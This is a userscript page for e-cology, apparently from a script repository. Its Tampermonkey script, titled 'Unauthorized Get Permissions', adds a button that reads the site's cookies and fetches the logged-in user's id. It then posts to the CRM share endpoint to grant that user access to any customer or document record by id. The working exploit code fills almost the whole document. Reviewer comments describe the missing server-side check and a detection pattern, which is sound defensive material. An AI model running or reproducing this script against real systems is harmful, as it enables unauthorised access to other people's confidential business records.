e-cology Unauthorized Get Permissions

Unauthorized sharing of arbitrary entity

当前为 2024-08-29 提交的版本,查看 最新版本

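  // ==UserScript==
  // @name e-cology Unauthorized Get Permissions
  // @namespace http://tampermonkey.net/
  // @version 0.5
  // @description Unauthorized sharing of arbitrary entity
  // @author Douglas Lee
  // @match https://www.e-cology.com.cn/*
  // @grant GM_xmlhttpRequest
  // @grant GM_getValue
  // @grant GM_setValue
  // @grant GM_cookie
  // @grant GM_addStyle
  // @run-at document-end
  // @connect www.e-cology.com.cn
  // ==/UserScript==

  // Reviewer notes (defensive reading of this proof of concept)
  //
  // What the code shows: it asks /api/hrm/card/getCurrentSimpleEmployee for the
  // logged-in user's id, then POSTs to /api/crm/common/share/shareAll.common
  // with that id in `sids`, a record id in `entityIds`, module "customer" and
  // shareType "sharer". In other words the caller names itself as the recipient
  // of a share. The title and @description state that the server performs this
  // without checking whether the caller may share the record; that claim is the
  // author's and cannot be confirmed from the client code alone.
  //
  // Server-side control the claim points at: the share handler has to authorise
  // every id in `entityIds` against the session user (owner, or an explicitly
  // delegated sharing right) and reject the request otherwise. An id supplied
  // by the client is never evidence of access.
  //
  // Detection: share requests whose `sids` holds only the requester's own id,
  // for records the requester could not read before the request, are the
  // pattern worth alerting on; share rows already created that way are worth
  // auditing.
  //
  // Before installing: @grant GM_cookie lets the script read the site's cookie
  // jar (depending on the userscript manager this can include HttpOnly session
  // cookies). GM_getValue, GM_setValue and GM_addStyle are granted but never
  // used below.

  (function () {
    'use strict';

    const ORIGIN = 'https://www.e-cology.com.cn';

    // URL shapes from which the id of the record on the current page is read.
    const urlPatterns = [
      /customerViewPage\/(\d+)__targetId=/,
      /docDetail\/(\d+)$/,
    ];

    // Record id taken from the current URL; stays empty when no pattern matches,
    // in which case the id is asked for in the pop-up instead.
    let entityIds = '';
    for (const pattern of urlPatterns) {
      const match = window.location.href.match(pattern);
      if (match) {
        entityIds = match[1];
        break;
      }
    }

    /**
     * Show a failure to the user instead of failing silently.
     * @param {string} detail - Short description of what went wrong.
     */
    function reportFailure(detail) {
      alert('An error occurred: ' + detail);
    }

    /**
     * Build the request headers shared by both API calls.
     * @param {string} cookieString - Value for the Cookie header.
     * @returns {Object<string, string>} Header map for GM_xmlhttpRequest.
     */
    function buildHeaders(cookieString) {
      return {
        'Content-Type': 'application/json;charset=UTF-8',
        'Cookie': cookieString,
        'Accept': 'application/json, text/plain, */*',
      };
    }

    /**
     * Read the site's cookies and hand them over as one Cookie header value.
     * The original repeated this lookup in two places; it now lives here once.
     * @param {function(string): void} callback - Receives "name=value; ..." pairs.
     */
    function withCookieHeader(callback) {
      GM_cookie('list', { url: `${ORIGIN}/` }, (cookies, error) => {
        // The original called cookies.map() unconditionally and threw when the
        // lookup failed.
        if (error || !Array.isArray(cookies)) {
          reportFailure(String(error || 'cookie list unavailable'));
          return;
        }
        callback(cookies.map(({ name, value }) => `${name}=${value}`).join('; '));
      });
    }

    /**
     * Look up the id of the logged-in user.
     * @param {function(*): void} callback - Called with `data.id` from the
     *   response; not called when the response carries no id.
     */
    function getSid(callback) {
      withCookieHeader((cookieString) => {
        GM_xmlhttpRequest({
          method: 'GET',
          url: `${ORIGIN}/api/hrm/card/getCurrentSimpleEmployee`,
          headers: buildHeaders(cookieString),
          onload(response) {
            let payload;
            try {
              payload = JSON.parse(response.responseText);
            } catch (parseError) {
              // A login page or an error page is not JSON; say so rather than throw.
              reportFailure('unexpected response from getCurrentSimpleEmployee');
              return;
            }
            if (payload && payload.data && payload.data.id) {
              callback(payload.data.id);
            }
          },
          onerror(error) {
            reportFailure(error.statusText);
          },
        });
      });
    }

    /**
     * Send the share request for the given record id(s), naming the current
     * user as the recipient, and reload the page when the server accepts it.
     * @param {string} entityIds - Record id(s) placed in the request body as-is.
     */
    window.getPermissions = function (entityIds) {
      getSid((sid) => {
        withCookieHeader((cookieString) => {
          const data = {
            departmentIds: '',
            entityIds: entityIds,
            groupIds: '',
            module: 'customer',
            shareType: 'sharer',
            sids: `${sid},`,
          };

          GM_xmlhttpRequest({
            method: 'POST',
            url: `${ORIGIN}/api/crm/common/share/shareAll.common`,
            headers: buildHeaders(cookieString),
            data: JSON.stringify(data),
            onload(response) {
              // The original reloaded on every completed response, which hid a
              // refusal. A server that enforces authorisation is expected to
              // answer with a non-2xx status, and that must be visible when
              // this script is used to confirm a fix.
              if (response.status < 200 || response.status >= 300) {
                reportFailure(response.statusText || String(response.status));
                return;
              }
              location.reload();
            },
            onerror(error) {
              reportFailure(error.statusText);
            },
          });
        });
      });
    };

    // Floating button.
    const button = document.createElement('button');
    button.textContent = 'get Permissions'; // static label: textContent, not innerHTML
    Object.assign(button.style, {
      position: 'fixed',
      right: '10px',
      bottom: '50px',
      zIndex: '1000',
      backgroundColor: '#4CAF50',
      color: 'white',
      border: 'none',
      padding: '10px',
      cursor: 'pointer',
    });
    document.body.appendChild(button);

    // Pop-up used when no id could be read from the URL.
    const modal = document.createElement('div');
    Object.assign(modal.style, {
      display: 'none',
      position: 'fixed',
      right: '10px',
      bottom: '50px',
      zIndex: '1000',
      backgroundColor: 'white',
      padding: '20px',
      boxShadow: '0px 0px 10px rgba(0, 0, 0, 0.1)',
    });
    document.body.appendChild(modal);

    const entityIdsInput = document.createElement('input');
    entityIdsInput.placeholder = 'Enter entityIds';
    Object.assign(entityIdsInput.style, {
      width: '100%',
      marginBottom: '10px',
    });
    modal.appendChild(entityIdsInput);

    const submitButton = document.createElement('button');
    submitButton.textContent = 'Get Permissions';
    Object.assign(submitButton.style, {
      backgroundColor: '#008CBA',
      color: 'white',
      border: 'none',
      padding: '10px',
      cursor: 'pointer',
    });
    modal.appendChild(submitButton);

    // Floating button: send directly when the URL supplied an id, otherwise
    // show or hide the pop-up.
    button.addEventListener('click', (event) => {
      event.preventDefault();
      event.stopPropagation();
      if (entityIds) {
        window.getPermissions(entityIds);
      } else {
        modal.style.display = modal.style.display === 'none' ? 'block' : 'none';
      }
    });

    // Pop-up submit: send the request for the id typed by the user.
    submitButton.addEventListener('click', (event) => {
      event.preventDefault();
      event.stopPropagation();
      const typed = entityIdsInput.value.trim();
      if (!typed) {
        // The original sent the request even with an empty field.
        return;
      }
      entityIds = typed;
      window.getPermissions(entityIds);
    });
  })();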